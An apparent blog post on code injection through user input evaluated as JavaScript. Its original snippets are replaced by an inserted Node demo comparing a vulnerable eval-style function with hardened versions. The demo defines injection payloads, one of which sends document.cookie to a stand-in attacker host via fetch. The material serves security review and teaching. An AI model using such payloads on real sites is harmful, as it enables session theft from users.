Un-sanitized User Input In Your JavaScript Is Dangerous

Adam Presley
2 min read · Nov 30, 2020
Photo by Luis Villasmil on Unsplash

Disclaimer: The following statements are mine, and do not relate to my employer or any of their or my clients. This article is based on a real story, but the details have been changed to protect the original source.

As software engineers we often have a hundred things to consider aside from the code we are writing, be it testing, servers, or deployment. One area that can be easily overlooked is security. I came across the following gem one day when assisting in a security review of an application.

The application in question accepted user input and, at some point in its processing, concatenated or otherwise processed that input into a variable. The security testing team reported a finding against this, and I was asked what the following code would do.

Interestingly enough, it will alert! I hadn't seen that one before. So my next thought was: could I do something more sinister, like fetch a remote script or data? So I tried this next.
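The snippets the article refers to are not reproduced on this page, so the following is an added example of mine, not the article's code: it models the pattern the article describes (user input concatenated into a string of JavaScript that is later evaluated) with a hypothetical `buildGreetingUnsafe` function, and then goes a step beyond the alert to show that the same injection point reaches `fetch()` and `document.cookie`. `alert`, `fetch` and `document` are stubbed so the payloads can be observed under Node rather than a browser; the payloads, the cookie value and the attacker host are constructed for the demo. Two hardened variants follow the vulnerable one.

```javascript
// Added example, not the article's code. buildGreetingUnsafe is a hypothetical
// stand-in for "user input concatenated into a variable" that is then evaluated.
// alert/fetch/document are stubbed so payload effects can be observed outside
// a browser; the cookie value and attacker host are constructed sample data.

const calls = [];                        // what each payload managed to reach
globalThis.alert = (msg) => { calls.push('alert:' + msg); };
globalThis.fetch = (url) => { calls.push('fetch:' + url); return Promise.resolve(); };
globalThis.document = { cookie: 'sid=abc123' };

// Vulnerable: the value is spliced into source code. A double quote in the
// input terminates the string literal and everything after it runs as code.
function buildGreetingUnsafe(userName) {
  const src = 'var greeting = "Hello, " + "' + userName + '" + "!"; return greeting;';
  return new Function(src)();            // same trust boundary as eval()
}

// Hardened 1: perform the same computation on the value as data. No evaluation
// step exists, so there is nothing for the input to break out of.
function buildGreetingSafe(userName) {
  return 'Hello, ' + String(userName) + '!';
}

// Hardened 2: if generating source is unavoidable, emit the value as a JSON
// string literal. Quotes, backslashes and control characters are escaped, so the
// input cannot close the literal (modern engines accept U+2028/U+2029 inside
// string literals, so JSON.stringify output is a valid JS literal there).
function buildGreetingEscaped(userName) {
  const src = 'var greeting = "Hello, " + ' + JSON.stringify(String(userName)) +
              ' + "!"; return greeting;';
  return new Function(src)();
}

// Constructed payloads: the first is the "it will alert" case; the second uses
// the same break-out to ship document.cookie to an attacker-controlled host.
const PAYLOAD_ALERT = '" + alert(1) + "';
const PAYLOAD_EXFIL = '"; fetch("https://attacker.example/?c=" + document.cookie); var x = "';

function runDemo() {
  calls.length = 0;
  const results = {
    unsafeAlert:  buildGreetingUnsafe(PAYLOAD_ALERT),    // alert fires
    unsafeExfil:  buildGreetingUnsafe(PAYLOAD_EXFIL),    // fetch fires with the cookie
    safeAlert:    buildGreetingSafe(PAYLOAD_ALERT),      // payload stays inert text
    escapedAlert: buildGreetingEscaped(PAYLOAD_ALERT),   // same text, no alert
    escapedExfil: buildGreetingEscaped(PAYLOAD_EXFIL),   // same text, no fetch
  };
  return { results, calls: calls.slice() };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(runDemo(), null, 2));
}
```

Run it with `node` and compare `calls` against `results`: only the unsafe variant records an `alert:` and a `fetch:` entry, while both hardened variants return the payload verbatim as harmless text. The practical check when reviewing code like this is to search for every place a string reaches `eval`, `new Function`, or `setTimeout`/`setInterval` with a string argument, and to trace whether any fragment of that string originates from a request, a URL, or stored user data; once such a path exists, the payload is limited only by what the page's origin can do, which is why the alert is a proof rather than the damage.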
